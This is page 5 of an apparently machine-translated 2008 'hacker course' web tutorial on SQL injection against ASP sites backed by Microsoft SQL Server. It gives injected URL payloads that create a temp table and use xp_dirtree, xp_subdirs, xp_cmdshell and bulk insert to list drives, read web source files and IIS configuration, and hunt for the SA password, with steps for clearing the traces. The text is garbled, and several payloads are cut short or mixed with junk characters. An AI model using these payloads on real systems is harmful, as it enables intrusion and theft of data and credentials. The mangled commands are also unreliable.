You are here: hacking technology > hacker course > Content
Hot Articles
Recommend Articles
New Articles
The hacker teaches you anything is the SQL injection method attack(5)
  Add date: 07/16/2008   Publishing date: 07/16/2008   Hits: 13
Total 10 pages, Current page:5, Jump to page:
 

First, guesses the solution according to the experience, generally speaking, the WEB hypothesized catalog is: c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot and so on, but may carry out the hypothesized table of contents is: c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts and so on.
Second, the traversal system's table of contents structure, the analysis result and discovers the WEB hypothesized catalog;
Founds one first near the watch: temp
HTTP://xxx.xxx.xxx/abc.asp? p=YY; create&n… mp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255)); --  
Then:
(1) we may obtain the current all drivers using xp_availablemedia, coexisting enter in the temp table:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert temp… ter.dbo.xp_availablemedia;
We may through inquire the temp content to obtain the driver tabulation and the related information
(2) we may obtain the child directory tabulation using xp_subdirs, coexisting enter in the temp table:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp (i… dbo.xp_subdirs 'c:\';
(3) we may also obtain all child directories using xp_dirtree the directory tree structure, and the inch enters in the temp table:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';
This may succeed browsing all catalogs (folder) tabulates:
 
If we need to examine that some document the content, may through carry out xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id) exec… nbsp; 'type c:\web\index.asp'; -- =Vu; [Iq~TD  
The use ' bulk insert'yufa may insert a text document to one near the watch. For example: bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'

Glanced over temp to be possible to read the index.asp document the content! Through analyzes each kind of ASP document, may obtain the massive system messages, the WEB construction and the management information, even may obtain the SA account number connection password.

Certainly, if xp_cmshell can carry out, we may use it to complete:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id)&nbs… cmdshell 'dir c:\
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id)&n… p_cmdshell 'dir c:\ *.asp /s/a';
 
We may see through xp_cmdshell all wants to see, including W3svc  
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id) exec master.dbo.xp_cmdshe… ub \ AdminScripts \ adsutil.vbs enum w3svc' 1Bh) 6^? JxC  
 
But, if is not the SA jurisdiction, we may also use  
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\'; -- ) G+^u3~7qv  
 
Attention:  
1st, after above completes a browsing every time, should delete in TEMP all contents, deletes the method is:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; delete from temp
2nd, glances over the TEMP table the method is: (supposition TestDB is current connection database name) $
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top&… nbsp; TestDB.dbo.temp) >0 obtains in table TEMP the first record id field value, and carries on the comparison with the integer, obviously abc.asp works unusually, but in exceptionally actually may discover the id field the value. The supposition discovered the table name is xyz, then oBChnW fcf  

 
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * Next>>
Prev:The random combined command achieves exempts kills Next:The SQL weak password 1433 catch the chicken to meet the question

Comment:

Category: Home > hacker course